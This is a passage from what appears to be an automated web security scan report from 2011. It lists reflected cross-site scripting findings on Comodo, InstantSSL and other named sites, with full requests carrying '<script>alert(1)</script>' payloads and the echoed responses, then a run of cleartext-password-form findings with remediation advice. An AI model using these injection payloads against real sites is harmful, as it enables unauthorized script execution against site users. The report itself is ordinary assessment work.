Date: Sun, 18 Sep 2011 09:40:04 GMT
Server: Apache Tomcat/4.0.6 (HTTP/1.1 Connector)
X-Cache: MISS from cert.webtrust.org
Connection: close
Content-Type: text/html
Content-Length: 258

<html>
<head>
<title>Web Trust</title>
<link rel="stylesheet" href="/admin.css" type="text/css">
</head>
<body>
Invalid domain [http://www.google.com/search?hl=en&q=e739f<script>alert(1)</script>4647f9dbaca]: please contact your practitioner.</body>
...[SNIP]...

1.45. https://secure.comodo.net/products/passwordResetRequest [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://secure.comodo.net
Path:	/products/passwordResetRequest

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83de1"><script>alert(1)</script>5fb9e3919804d0d3e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/passwordResetRequest?orderNumber=4654363456&loginName=aaa&emailAddress= HTTP/1.1
Host: secure.comodo.net
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=83de1"><script>alert(1)</script>5fb9e3919804d0d3e
Cache-Control: max-age=0
Origin: https://secure.comodo.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:55:37 GMT
Content-Type: text/html; charset=us-ascii
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 457
Cache-Control: max-age=-1

<html>
<head>
<title>Password Reset: ERROR!</title>
<link rel="stylesheet" href="/css/css.css">
</head>
<body>
<b>4654363456</b> is not a valid Order Number.
<br><br><input type="button" class="input" value="< Back" onClick="window.location = 'http://www.google.com/search?hl=en&q=83de1"><script>alert(1)</script>5fb9e3919804d0d3e'">
...[SNIP]...

1.46. https://secure.instantssl.com/products/passwordResetRequest [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://secure.instantssl.com
Path:	/products/passwordResetRequest

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20e00"><script>alert(1)</script>5da064f00b0ed38bb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/passwordResetRequest?orderNumber=4543252345324523453245&loginName=&emailAddress=4353245 HTTP/1.1
Host: secure.instantssl.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=20e00"><script>alert(1)</script>5da064f00b0ed38bb
Cache-Control: max-age=0
Origin: https://secure.instantssl.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1316328656750r0.6942118240986019; __utmx=261615573.; __utmxx=261615573.; optimizelyBuckets=%7B%229298079%22%3A9298080%7D; __utma=261615573.129590781.1316328660.1316328660.1316362417.2; __utmb=261615573; __utmc=261615573; __utmz=261615573.1316362417.2.2.utmccn=(referral)|utmcsr=comodo.com|utmcct=/e-commerce/ssl-certificates/free-ssl-cert.php|utmcmd=referral

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:14:02 GMT
Content-Type: text/html; charset=us-ascii
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 469
Cache-Control: max-age=-1

<html>
<head>
<title>Password Reset: ERROR!</title>
<link rel="stylesheet" href="/css/css.css">
</head>
<body>
<b>4543252345324523453245</b> is not a valid Order Number.
<br><br><input type="button" class="input" value="< Back" onClick="window.location = 'http://www.google.com/search?hl=en&q=20e00"><script>alert(1)</script>5da064f00b0ed38bb'">
...[SNIP]...

1.47. https://secure.comodo.com/products/!PlaceOrder [errorURL parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.comodo.com
Path:	/products/!PlaceOrder

Issue detail

The value of the errorURL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4151"><script>alert(1)</script>c83876de017faa9a0 was submitted in the errorURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/!PlaceOrder?errorURL=http%3A%2F%2Fhackerguardian.com%2Fpci-compliance%2Faddsupport%2Fssl-purchase.htmlb4151"><script>alert(1)</script>c83876de017faa9a0&_3_PPP=&_3_location=&_4_PPP=&_4_location=&isReturningCustomer=Y&loginName=324234234&loginPassword=324234234434&vatNumber=&vatStatus=2&currency=&region=&referrerURL=&entryURL=&ap=hackerguardian&successURL=http%3A%2F%2Fwww.hackerguardian.com%2F&_1_PPP=3460&iAgreeToTheTsAndCs=Y&contractSignerName=&contractSignerTitle=&contractSignerTelephoneNumber=&contractSignerEmailAddress=&Submit.x=72&Submit.y=16&Submit=Submit HTTP/1.1
Host: secure.comodo.com
Connection: keep-alive
Referer: http://hackerguardian.com/pci-compliance/addsupport/ssl-purchase.html
Cache-Control: max-age=0
Origin: http://hackerguardian.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1315419552319r0.6822604623157531; km_ai=nxNThomVDaBwwqN7xx0NPXpwd58%3D; km_lv=1316328762; km_uq=; PHPSESSID=f8719f41bb3d4af1231ab0216071d42d; WRUID=1666513654.2102610049; WRIgnore=true; optimizelyCustomEvents=%7B%228018129%22%3A%5B%22Need%20a%20pc%20expert%20try%20it%20now%20button%22%2C%22Top%20Buy%20Now%22%2C%22SSL%20Security%20(emerchant%20solutions)%22%2C%22banner%22%2C%22top%20menu%22%5D%7D; optimizelyBuckets=%7B%228015120%22%3A8013305%2C%228022314%22%3A8017411%7D; __utma=1.355449779.1315419555.1315419555.1316362394.2; __utmb=1.17.10.1316362394; __utmc=1; __utmz=1.1315419555.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)|utmctr=comodo

Response

HTTP/1.1 302 Found
Server: nginx
Date: Sun, 18 Sep 2011 11:20:45 GMT
Content-Type: text/html; charset=us-ascii
Connection: keep-alive
Keep-Alive: timeout=5
Location: http://hackerguardian.com/pci-compliance/addsupport/ssl-purchase.htmlb4151"><script>alert(1)</script>c83876de017faa9a0?errorCode=-4&errorItem=loginName&errorDetail=Password+cannot+contain+the+username.
Content-Length: 448
Cache-Control: max-age=-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://hackerguardian.com/pci-compliance/addsupport/ssl-purchase.htmlb4151"><script>alert(1)</script>c83876de017faa9a0?errorCode=-4&errorItem=loginName&errorDetail=Password+cannot+contain+the+username.">
...[SNIP]...

1.48. http://www.seeos.com/ [uid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.seeos.com
Path:	/

Issue detail

The value of the uid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89d07"><script>alert(1)</script>77e368347ea was submitted in the uid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?f HTTP/1.1
Host: www.seeos.com
Proxy-Connection: keep-alive
Referer: http://www.trustix.com/small/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=89d07"><script>alert(1)</script>77e368347ea

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:08:02 GMT
Server: Apache/2.2.17 (Ubuntu)
X-Powered-By: PHP/5.3.5-1ubuntu7.2
Set-Cookie: uid=89d07%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E77e368347ea; expires=Mon, 19-Sep-2011 12:08:02 GMT
Vary: Accept-Encoding
Content-Length: 865
Connection: close
Content-Type: text/html

<html>
<head>
<title>seeos.com: The Leading See OS Site on the Net</title>
</head>
<frameset cols="1,*,1" border=0>
<frame name="top" src="tg.php?uid=89d07"><script>alert(1)</script>77e368347ea&src=&cat=travel&kw=See+OS&sc=travel" scrolling=no frameborder=0 noresize framespacing=0 marginwidth=0 marginheight=0>
...[SNIP]...

2. Cleartext submission of password previous next
There are 23 instances of this issue:

http://forum.psoft.net/
http://www.vengine.com/
http://www.vengine.com/corporate/about.html
http://www.vengine.com/corporate/contact.html
http://www.vengine.com/products/best_practices.html
http://www.vengine.com/products/features.html
http://www.vengine.com/products/free_tools.html
http://www.vengine.com/products/overview.html
http://www.vengine.com/products/prove_it.html
http://www.vengine.com/products/tour.html
http://www.vengine.com/products/vengine/eula.html
http://www.vengine.com/products/vengine/faq.html
http://www.vengine.com/products/vengine/first_time.html
http://www.vengine.com/products/vengine/help.html
http://www.vengine.com/products/vengine/index.html
http://www.vengine.com/products/vengine/options.html
http://www.vengine.com/products/vengine/requirements.html
http://www.vengine.com/products/vengine/setup.html
http://www.vengine.com/products/vengine/ssl_feedback.html
http://www.vengine.com/products/vengine/uninstall.html
http://www.vengine.com/sitemap.html
http://www.vengine.com/support/faq.html
http://www.vengine.com/support/index.html

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

2.1. http://forum.psoft.net/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forum.psoft.net
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://forum.psoft.net/login.php?do=login

The form contains the following password field:

vb_login_password

Request

GET / HTTP/1.1
Host: forum.psoft.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:33:23 GMT
Server: Apache
Set-Cookie: bb_lastactivity=0; expires=Mon, 17-Sep-2012 12:33:23 GMT; path=/; domain=.psoft.net
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Content-Length: 99991
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" id="vbulletin_
...[SNIP]...
</script>
           <form id="navbar_loginform" action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
               <fieldset id="logindetails" class="logindetails">
...[SNIP]...
<input type="text" class="textbox default-value" name="vb_login_username" id="navbar_username" size="10" accesskey="u" tabindex="101" value="User Name" />
                   <input type="password" class="textbox" tabindex="102" name="vb_login_password" id="navbar_password" size="10" />
                   <input type="text" class="textbox default-value" tabindex="102" name="vb_login_password_hint" id="navbar_password_hint" size="10" value="Password" style="display:none;" />
...[SNIP]...

2.2. http://www.vengine.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:38:35 GMT
Content-Type: text/html
Content-Length: 11760
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<title>Anti Phishing Site
...[SNIP]...
<div id="login" style="top: 46px;">

<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.3. http://www.vengine.com/corporate/about.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/corporate/about.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field:

password

Request

GET /corporate/about.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/support/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.4.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:39:29 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 10580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Vengine.com - Ant
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.4. http://www.vengine.com/corporate/contact.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/corporate/contact.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field:

password

Request

GET /corporate/contact.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/corporate/about.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.5.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:39:31 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 10627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Phishing Software
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.5. http://www.vengine.com/products/best_practices.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/best_practices.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field:

password

Request

GET /products/best_practices.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:12 GMT
Content-Type: text/html
Content-Length: 20164
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Phishing Protecti
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.6. http://www.vengine.com/products/features.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/features.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field:

password

Request

GET /products/features.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:10 GMT
Content-Type: text/html
Content-Length: 13411
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Website Authentic
...[SNIP]...
<div id="login" style="top: 46px;">

<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.7. http://www.vengine.com/products/free_tools.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/free_tools.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field:

password

Request

GET /products/free_tools.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.2.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:39:14 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 15834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Int
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.8. http://www.vengine.com/products/overview.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/overview.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field:

password

Request

GET /products/overview.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:10 GMT
Content-Type: text/html
Content-Length: 10595
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Phishing Attacks
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.9. http://www.vengine.com/products/prove_it.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/prove_it.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field:

password

Request

GET /products/prove_it.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/corporate/contact.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.6.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:39:55 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 12353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Int
...[SNIP]...
<div id="login" style="top: 46px;">

<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.10. http://www.vengine.com/products/tour.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/tour.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field:

password

Request

GET /products/tour.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:11 GMT
Content-Type: text/html
Content-Length: 12345
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Ban
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.11. http://www.vengine.com/products/vengine/eula.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/vengine/eula.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field:

password

Request

GET /products/vengine/eula.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:05 GMT
Content-Type: text/html
Content-Length: 18642
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Int
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.12. http://www.vengine.com/products/vengine/faq.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/vengine/faq.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field:
